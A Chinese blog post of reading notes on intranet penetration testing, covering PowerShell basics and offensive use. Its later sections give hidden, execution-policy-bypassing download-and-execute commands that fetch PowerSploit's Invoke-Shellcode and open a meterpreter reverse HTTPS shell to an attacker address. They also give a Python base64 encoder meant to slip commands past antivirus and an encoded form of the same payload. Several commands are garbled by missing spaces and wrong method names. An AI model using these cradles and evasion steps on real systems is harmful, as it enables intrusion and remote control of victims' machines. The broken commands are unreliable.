内网安全攻防读书笔记(2)——powershell基础

最新推荐文章于 2022-12-07 17:41:08 发布
最新推荐文章于 2022-12-07 17:41:08 发布
阅读量3.6k 收藏 4
点赞数
分类专栏: 渗透测试 文章标签: 安全 网络 内网渗透 powershell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40909772/article/details/121554555
版权

文章目录


  powershell是windows的一种命令行外壳程序。只要一台计算机上可以运行代码,就可以将powershell脚本文件执行,甚至无需写入到磁盘中。powershell拥有以下几个重要的特点:

  • 脚本可以在内存中运行,不需要写入到磁盘中。
  • 可以远程执行。
  • 可用于管理活动目录。

  使用以下命令,可以查看powershell的版本和进入powershell命令行:

powershell
Get-host
$PSVersionTable.PSVERSION

在这里插入图片描述

1.基本概念

1.1 .ps1文件

  .ps1文件是powershell脚本文件的拓展名。其中包含一系列Powershell命令,每个命令显示为独立的一行。
在这里插入图片描述

1.2 执行策略

  为了防止运行恶意脚本,powershell在默认情况下,这个执行策略被设置为“不能运行”。执行下面的cmdlet命令查询当前的执行策略:

Get-ExecutionPolicy

在这里插入图片描述)
执行策略有下面几种类型:

  • Restricted:脚本不能运行(默认设置)。
  • RemoteSigned:在本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外)
  • AllSigned:仅当脚本由受信任的发布者签名时才能运行。
  • Unrestricted:允许当前所有脚本执行。

可以执行下面的命令设置执行策略:

Set-ExecutionPolicy  <policy-name>
1.3 管道

  管道的作用是将一个命令的输出作为另外一个命令的输入,两个命令之间用‘’|‘’连接。如下面一个例子,让所有运行的、名字以字符“p”开头的程序停止运行。

get-process p* | stop-process

2.常用命令

2.1 文件操作命令

  基础命令基本兼容shell Linux,下面是文件操作常用命令:

New-Item vuln -ItemType Directory        新建目录
New-Item 1.txt -ItemType File         新建文件
Remove-Item .\while\          删除目录
Get-Content .\1.txt         显示文本内容
Set-Content .\1.txt -Value "hello world!"    设置文本内容
Add-Content .\1.txt -Value "i love you"   追加文本内容,换行追加
Clear-Content .\1.txt   清除文本内容
2.2 绕过本地权限并执行
  • 将1.ps1上传至目标服务器。在命令行环境下,执行如下命令,绕过安全策略,在目标服务器本地执行该脚本文件。
powershell.exe -ExecutionPolicy Bypass -File 1.ps1

在这里插入图片描述

  • 将同一个脚本上传到服务器中,在目标本地执行脚本文件,命令如下:
powershell.exe exec bypass -Command "& {Import-Module 1.ps1;Invoke-AllChecks}"
  • 从服务器上下载脚本,绕过本地权限并隐藏执行
powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-Object Net.WebClient).DownloadString("http://192.168.1.1/Payload.ps1");[payload的参数]

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonIIEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1");Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80

下面是常用参数的说明:

  • ExecutionPolicy Bypass(-exe bypass):绕过安全策略。
  • WindowStyle Hidden(-W Hidden):隐藏窗口
  • NonInteractive(-NonI):非交互模式。Powershell不为用户提供交互式的提示。
  • -NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件。
  • -noexit:执行后不退出Shell。
  • -NoLogo:启动不显示版权的Powershell。
2.3 使用base64对PowerShell命令进行编码

  这样做的目的是混淆和压缩代码,从而避免脚本因为一些特殊字符被杀毒软件查杀。使用python脚本对所有powershell命令进行编码。Python脚本如下:

#!/usr/bin/env python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import sys
import re
import os
import getopt


def powershell_encode(data):
    # blank command will store our fixed unicode variable
    blank_command = ""
    powershell_command = ""
    # Remove weird chars that could have been added by ISE
    n = re.compile(u'(\xef|\xbb|\xbf)')
    # loop through each character and insert null byte
    for char in (n.sub("", data)):
        # insert the nullbyte
        blank_command += char + "\x00"
    # assign powershell command as the new one
    powershell_command = blank_command
    # base64 encode the powershell command
    powershell_command = base64.b64encode(powershell_command.encode())
    return powershell_command.decode("utf-8")


def usage():
    print("Version: {0}".format(__version__))
    print("Usage: {0} <options>\n".format(sys.argv[0]))
    print("Options:")
    print("   -h, --help                  Show this help message and exit")
    print("   -s, --script      <script>  PowerShell Script.")
    sys.exit(0)


def main():
    try:
        options, args = getopt.getopt(sys.argv[1:], 'hs:', ['help', 'script='])
    except getopt.GetoptError:
        print("Wrong Option Provided!")
        usage()
    if len(sys.argv) == 1:
        usage()

    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-s', '--script'):
            script_file = arg
            if not os.path.isfile(script_file):
                print("The specified powershell script does not exists")
                sys.exit(1)
            else:
                ps_script = open(script_file, 'r',encoding='latin1').read()
                print(powershell_encode(ps_script))


if __name__ == "__main__":
    main()

首先将powershell命令转换成文件命令如下:

echo "IEX(New-object Net.webClient).downloading('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1');Invoke-Shellcode-Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80 -Force" > raw.txt

使用脚本进行编码:
在这里插入图片描述
在远控主机上执行如下命令:

powershell.exe -Nop -NonI -w hidden -exec bypass -enc w78Aw74ASQAAAEUAAABYAAAAKAAAAE4AAABlAAAAdwAAAC0AAABvAAAAYgAAAGoAAABlAAAAYwAAAHQAAAAgAAAATgAAAGUAAAB0AAAALgAAAHcAAABlAAAAYgAAAEMAAABsAAAAaQAAAGUAAABuAAAAdAAAACkAAAAuAAAAZAAAAG8AAAB3AAAAbgAAAGwAAABvAAAAYQAAAGQAAABpAAAAbgAAAGcAAAAoAAAAJwAAAGgAAAB0AAAAdAAAAHAAAABzAAAAOgAAAC8AAAAvAAAAcgAAAGEAAAB3AAAALgAAAGcAAABpAAAAdAAAAGgAAAB1AAAAYgAAAHUAAABzAAAAZQAAAHIAAABjAAAAbwAAAG4AAAB0AAAAZQAAAG4AAAB0AAAALgAAAGMAAABvAAAAbQAAAC8AAABjAAAAaAAAAGUAAABlAAAAdAAAAHoAAAAvAAAAUAAAAG8AAAB3AAAAZQAAAHIAAABTAAAAcAAAAGwAAABvAAAAaQAAAHQAAAAvAAAAbQAAAGEAAABzAAAAdAAAAGUAAAByAAAALwAAAEMAAABvAAAAZAAAAGUAAABFAAAAeAAAAGUAAABjAAAAdQAAAHQAAABpAAAAbwAAAG4AAAAvAAAASQAAAG4AAAB2AAAAbwAAAGsAAABlAAAALQAAAC0AAABTAAAAaAAAAGUAAABsAAAAbAAAAGMAAABvAAAAZAAAAGUAAAAuAAAAcAAAAHMAAAAxAAAAJwAAACkAAAA7AAAASQAAAG4AAAB2AAAAbwAAAGsAAABlAAAALQAAAFMAAABoAAAAZQAAAGwAAABsAAAAYwAAAG8AAABkAAAAZQAAAC0AAABQAAAAYQAAAHkAAABsAAAAbwAAAGEAAABkAAAAIAAAAHcAAABpAAAAbgAAAGQAAABvAAAAdwAAAHMAAAAvAAAAbQAAAGUAAAB0AAAAZQAAAHIAAABwAAAAcgAAAGUAAAB0AAAAZQAAAHIAAAAvAAAAcgAAAGUAAAB2AAAAZQAAAHIAAABzAAAAZQAAAF8AAABoAAAAdAAAAHQAAABwAAAAcwAAACAAAAAtAAAATAAAAGgAAABvAAAAcwAAAHQAAAAgAAAAMQAAADkAAAAyAAAALgAAADEAAAA2AAAAOAAAAC4AAAAzAAAAMAAAAC4AAAAxAAAAMgAAADkAAAAgAAAALQAAAEwAAABwAAAAbwAAAHIAAAB0AAAAIAAAADgAAAAwAAAAIAAAAC0AAABGAAAAbwAAAHIAAABjAAAAZQAAAAoAAAAKAAAA
2.3 运行32位和64位powershell
powershell.exe -NoP -NonI -w Hidden -Exec Bypass      运行32位powershell脚本
%winDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W hidden -exec bypass  运行64位powershell脚本

这是一个powershell在线学习教程https://www.pstips.net/powershell-online-tutorials

晶晶娃在战斗
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
powershell攻击方法研究(翻译版)
weixin_41082546的博客
10-16 393
powershell攻击方法研究执行摘要在创建恶意软件时,攻击者越来越多地利用已存在于target上的工具来攻击计算机,因为Microsoft PowerShell默认安装在Windows计算机上,它是一个理想的攻击工具链的候选项, 由于powershell使用较为灵活,并且检测更困难,因此被很多攻击者所喜爱。PowerShell是一种功能强大的脚本语言和shell框架,主要用于管理Windows计算机。它已经存在了10多年,被许多系统管理员所使用,并且将来可能替换Windows上的默认命令提示符。Powe
PowerShell基础教程.doc
最新发布
11-27
◆Windows PowerShell 并不处理文本,而是处理以.NET平台为基础的对象; ◆Windows PowerShell 附带了数量庞大的内置命令集和一致的接口; ◆对于各个工具,全部的外壳程序命令都使用相同的命令剖析器,而非使用...
PowerShell简介(WEB安全攻防)
小英雄颂人头
03-02 780
0xx1 PowerShell技术 常用的PowerShell攻击工具 PowerSploit PowerShell后期漏洞利用框架,常用于信息探测,特权提升,凭证窃取,持久化等操作 Nishang 基于PowerShell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire 基于PowerShell的...
内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
闵行小鱼塘
04-07 4389
本篇开始阅读学习《内网安全攻防:渗透测试实战指南》,做个笔记 本篇是第一章内网渗透测试基础,基本都是些基础概念和环境搭建
内网安全攻防:渗透测试实战指南》读书笔记(八):权限维持分析及防御
闵行小鱼塘
04-22 4660
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是权限维持分析及防御,分析了常见的针对操作系统后门、Web后门及域后门(白银票据、黄金票据等)的攻击手段,并给出了相应的检测和防范方法
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
探索PowerShell(五) PowerShell基础知识
01-20
PowerShell中,我们可以轻松的与数据、对象进行交互,为了简化我们访问外部数据,PowerShell允许我们像操作驱动器、文件一样对数据、对象等进行操作。 使用这条命令,查看我们已有的Providers:get-psprovider  ...
内网安全分析.jpg
05-20
涵盖了内网安全方面几乎所有的研究成果,内网基础知识开始到域环境的搭建,攻击环境的搭建及常用工具;内网扫描探测;隐藏通信隧道技术;PowerShell的利用和脚本技术;本地权限提升技术;域内横向渗透的主要方法手段...
PowerShell 入门基础教程
01-20
Windows PowerShell 是专为系统管理员设计的新 Windows 命令行外壳程序。该外壳程序包括交互式提示和脚本环境,两者既可以独立使用也可以组合使用。 现在win2008,win7都集成了PowerShell,系统不带PowerShell可以...
任意文件读取漏洞知识梳理
热门推荐
qq_40909772的博客
11-17 1万+
文章目录1.概述2.开发语言触发点2.1 PHP2.2 Python2.3 Java2.4 Ruby2.5 Node3.中间件/服务器相关触发点3.1 Nginx错误配置3.2 数据库3.3 软链接3.4 FFmpeg3.5 Docker-API4.文件读取的目标目录5.题目复现5.1 afr_15.2 afr_25.3 afr_3 1.概述   文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。主要读取的文件是服务器的各种配置文件、文件形式存储的密钥、服务器信息(包括正在执行的进
SQL注入知识梳理
qq_40909772的博客
11-11 7716
文章目录1.数字型和UNION注入2.数据库结构未知是如何得知数据表的字段名和表名?3.字符型注入和布尔注入3.1 字符型注入3.2 布尔盲注4.报错注入5.堆叠注入6.二次注入7.注入点7.1 SELECT注入7.2 insert注入7.4 update注入7.4 delete注入8.注入的防御8.1 字符替换8.2 逃逸引号 1.数字型和UNION注入 有如下数据库结构: <?php require_once 'conn.php'; $res = mysqli_query($conn,"sele
内网安全攻防读书笔记(5)——探测域内存活主机和端口扫描
qq_40909772的博客
01-07 5145
  实际探测可以在白天和晚上分别进行探测。 1.利用NetBIOS快速探测内网   nbtscan工具已经上传到我的资源,大家可以下载。此工具用于扫描本地或远程TCP/IP网络上开放NetBIOS名称服务器。有Windows和Linux两个版本,将其上传到目标服务器就可以直接使用。使用命令如下: nbtscan.exe 192.168.1.0/24 2.利用ICMP协议快速探测内网   依次对内网中每个IP地址执行ping命令,可以快速找出内网中所有存活的主机。在渗透测试中,可以使用如下命令循环探测整个
sqlmap进阶—参数讲解
qq_40909772的博客
07-02 3377
1.–level 5:探测等级。   —level 5 参数代表需要执行的测试等级为5,sqlmap一共有5个测试等级1~5,不加等级参数默认是1。使用测试等级5会使用更多的payload,会自动破解出Cookie、XFF等头部注入。在不确定哪个Payload或参数为注入点时,为了保证全面性,建议使用最高的level值。 2.–is-dba:当前用户是否为管理权限。   该命令用于查看当前账户是否为数据库管理员账户,命令如下,数据返回True则表示是管理员。 py2 sqlmap.py -u "http:/
记一次挖矿病毒的应急响应
qq_40909772的博客
01-14 3020
1.概述   接到通知某单位中了挖矿病毒被通告了需要去应急排查中毒主机。 2.排查思路 根据通告信息中的地址,询问客户,发现其中的地址信息是路由器的地址。查看配置是因为在出口路由器上做了nat,所以此地址不是中毒主机。 尝试查看路由器中是否存在nat地址转化表,最后发现路由器上是做了基于端口的地址转换,这个方法行不通。 思考后决定去客户核心交换机上进行抓包分析。 3.镜像端口配置   客户设备是一台华为的设备,如下图是模拟的一个拓扑:   例如配置GigabitEthernet0/0/1端口流量镜像
SSRF题目复现
qq_40909772的博客
11-19 2639
1. [HITCON 2017] SSRFme。 题目平台地址:https://buuoj.cn/challenges 进入题目环境之后是代码审计,代码如下: 59.49.169.109 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_AD
内网安全攻防读书笔记(1)——内网基础知识
qq_40909772的博客
11-12 2160
文章目录1.工作组2.域2.1 单域2.2 父域和子域2.3 域树2.4 域森林2.5 域名服务器3.活动目录4.域控制器和活动目录的区别5.安全域的划分   内网也指局域网,是指在某一区域有多台计算机互连而成的计算机组。可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真等。 1.工作组   为了方便管理成白上千的计算机组成的局域网,出现了工作组的概念。实现手段就是将不同计算机按照功能或部门分别列入不同的工作组。   加入或者创建工作组的方法是:右击“我的电脑”,选择属性,依次
log4j2漏洞检测和利用
qq_40909772的博客
12-07 1491
漏洞检测使用的是BP插件,插件地址。 JNDI注入工具,工具地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0,命令如下: 将以下命令进行base64编码,IP替换为你攻击机IP。 使用工具命令如下: burp发包: 反弹shell成功:
sql注入实战—Boolean注入
qq_40909772的博客
07-15 1209
测试网站:自建靶场 http://192.168.57.128:1237/sql/boolean.php?id=1 测试工具:Burp Suite 1.访问目标测试地址,使用burp进行抓包。返回的测试结果如下所示: 2.使用id=1’ and 1=1%23,id=1’ and 1=2%23,发现返回的结果分别是yes和no,如下所示:   由以上输出的结果可知,不能使用union注入,此处可以使用Boolean注入,Boolean注入是指在构造SQL判断语句1,通过查看页面的返回结果来推测哪些SQL判断
windows内网渗透powershell
10-14
在Windows内网渗透中,PowerShell是一个非常强大的工具,可以用于执行各种攻击和渗透技术。以下是一些常见的PowerShell攻击和渗透技术: 1. 使用PowerShell Empire进行横向移动和持久化 2. 使用PowerShell进行密码破解和凭证收集 3. 使用PowerShell进行端口转发和代理 如果要在内网中使用PowerShell进行渗透,可以使用以下步骤: 1. 获取目标系统的管理员权限 2. 下载和安装PowerShell Empire或其他PowerShell攻击工具 3. 使用PowerShell Empire或其他工具进行横向移动和持久化 4. 使用PowerShell进行密码破解和凭证收集 5. 使用PowerShell进行端口转发和代理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晶晶娃在战斗

你的鼓励将是我创作的最大动力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值